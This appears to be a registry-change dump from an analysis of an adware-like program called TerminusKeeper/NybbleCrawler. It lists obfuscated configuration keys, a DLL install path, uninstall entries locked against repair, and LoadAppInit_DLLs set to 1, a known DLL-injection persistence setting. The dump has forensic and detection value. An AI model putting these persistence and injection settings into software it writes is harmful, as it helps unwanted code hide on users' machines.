[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"Mode" = "4026531840"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"340d3099" = "/P////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"c99a5f5c" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"2e22d94e" = "///%"

[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"n" = "1"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"7f69fa1f" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"414bc593" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"f1f24e29" = "Vl/l/C/////%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"7367429f" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\00000000]
"370856c7" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"QuietUninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\TERMIN~1\TERMIN~1.DLL,_uninstall /un /uq"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"e46c271e" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"3c09c42b" = "///%"
"c6c5dd44" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"usr.1" = "PC ACFabcdefABCDWY"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"7367429f" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"Version" = "22022148"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"3efeb33e" = ""

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"e46c271e" = "///%"
"a2e3b941" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"2e22d94e" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"data.0" = "ylN02cKwRmiKakztvqeQ0hbt7/5r8kXDWB6fVV0 1R9ENN03GpfkHf8ccg6pVYI75JoJxLo1KGh0BHsbVNkv7mJ2 ECnxzqE12"
"data.1" = "dqDqm3me uMixabcdeYKgxSiir/DCzlUaJ9i2FEpFRQ/8peP02yw6ELFkW/NhrmAaM nVTGJ7dZOaSfxYRigEi7Ow8MFvlLO61f5ZrQtpiALT6jgebbiyQQyOZ4sMdtchi"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"a0743acc" = "N/////%%"
"a1dcff5b" = "V/////%%"
"8b9e4cbc" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"7f69fa1f" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"27ddcf6f" = "///%"

[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"daaabfc6" = "%Program Files%\TerminusKeeper\TerminusKeeper.dll"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"Mode" = "4026531840"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"fe94ce1e" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"UninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\TERMIN~1\TERMIN~1.DLL,_uninstall /un"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"27ddcf6f" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"usr.0" = "6HJ35AXZTVNPRJLFHw"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"bbf88800" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"uuid" = "8738532578695851691"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"NoModify" = "1"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"48bd1aff" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"d1abcdb6" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"0c230bcb" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"Install_Dir" = "%Program Files%\TerminusKeeper"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"uuid" = "8738532578695851691"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"bbf88800" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"c99a5f5c" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"a1dcff5b" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"data.0" = "ylN02cKwRmiKakztvqeQ0hbt7/5r8kXDWB6fVV0 1R9ENN03GpfkHf8ccg6pVYI75JoJxLo1KGh0BHsbVNkv7mJ2 ECnxzqE12"
"data.1" = "dqDqm3me uMixabcdeYKgxSiir/DCzlUaJ9i2FEpFRQ/8peP02yw6ELFkW/NhrmAaM nVTGJ7dZOaSfxYRigEi7Ow8MFvlLO61f5ZrQtpiALT6jgebbiyQQyOZ4sMdtchi"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"51d2f2ea" = "IxA3/XZ/FxAm/XJ/PlAf/XD/clAm/XJ/bx////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"State" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"a0743acc" = "N/////%%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"587b5709" = "V/////%%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\00000000]
"3efeb33e" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F D1 B4 B9 E4 DD C5 30 2F 5F E0 A4 BC 1C 07 0A"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"370856c7" = ""

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"bbf88800" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"72758a5d" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"8b9e4cbc" = "V/////%%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"f6ad6fa6" = "V/////%%"
"c5705860" = "Vx////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"a2e3b941" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"0dc3ee96" = "/P////%%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"38583bc3" = "Ml/2/CF/M//g/CZ////%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"0e93c3f3" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"LRTS" = "0"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"3c09c42b" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"7367429f" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"svt" = "1435726521"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"587b5709" = "V/////%%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"a2e3b941" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"svx" = ""

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"48bd1aff" = "V/////%%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"usr.0" = "6HJ35AXZTVNPRJLFHw"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"2d71d5ab" = "V/////%%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"svn" = "TerminusKeeper"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"7f69fa1f" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"svi" = "0"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"65114b36" = "Vl/l////"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"dlpath" = "c:\progra~1\termin~1\termin~1.dll"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"date" = "1435726441"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"65114b36" = "Vl/l////"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"iiid" = "1"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"LRTS" = "0"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"38583bc3" = "Ml/2/CF/M//g/CZ////%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"72758a5d" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"0dc3ee96" = "/P////%%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"f0bf0bde" = "///%"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"38583bc3" = "Ml/2/CF/M//g/CZ////%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"svn" = "TerminusKeeper"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"8b9e4cbc" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"c5705860" = "Vx////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"svi" = "0"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"usr.0" = "6HJ35AXZTVNPRJLFHw"
"usr.1" = "PC ACFabcdefABCDWY"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"svt" = "1435726521"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"f6ad6fa6" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"Publisher" = "NybbleCrawler"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"svx" = ""

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"e46c271e" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"6185d035" = "Vx/2/Cx/V//l////"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"1520c6f1" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"f0bf0bde" = "///%"
"fe94ce1e" = "V/////%%"
"72758a5d" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"DisplayName" = "NybbleCrawler"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"d1abcdb6" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"1520c6f1" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"date" = "1435726441"
"LRTS" = "0"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"340d3099" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"usr.1" = "PC ACFabcdefABCDWY"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"51d2f2ea" = "IxA3/XZ/FxAm/XJ/PlAf/XD/clAm/XJ/bx////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"Cache" = "9428760297565573948"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"414bc593" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"2e22d94e" = "///%"

"414bc593" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"InstallDate" = "20140701"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"51d2f2ea" = "IxA3/XZ/FxAm/XJ/PlAf/XD/clAm/XJ/bx////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"data.1" = "dqDqm3me uMixabcdeYKgxSiir/DCzlUaJ9i2FEpFRQ/8peP02yw6ELFkW/NhrmAaM nVTGJ7dZOaSfxYRigEi7Ow8MFvlLO61f5ZrQtpiALT6jgebbiyQQyOZ4sMdtchi"
"data.0" = "ylN02cKwRmiKakztvqeQ0hbt7/5r8kXDWB6fVV0 1R9ENN03GpfkHf8ccg6pVYI75JoJxLo1KGh0BHsbVNkv7mJ2 ECnxzqE12"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"6185d035" = "Vx/2/Cx/V//l////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"f0bf0bde" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"Mode" = "4026531840"
"iiid" = "1"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"65114b36" = "Vl/l////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"uuid" = "8738532578695851691"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"c6c5dd44" = "V/////%%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"NoRepair" = "1"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"340d3099" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"a0743acc" = "N/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}]
"n" = "1"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"f6ad6fa6" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"3efeb33e" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"27ddcf6f" = "///%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"State" = "0"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"0e93c3f3" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
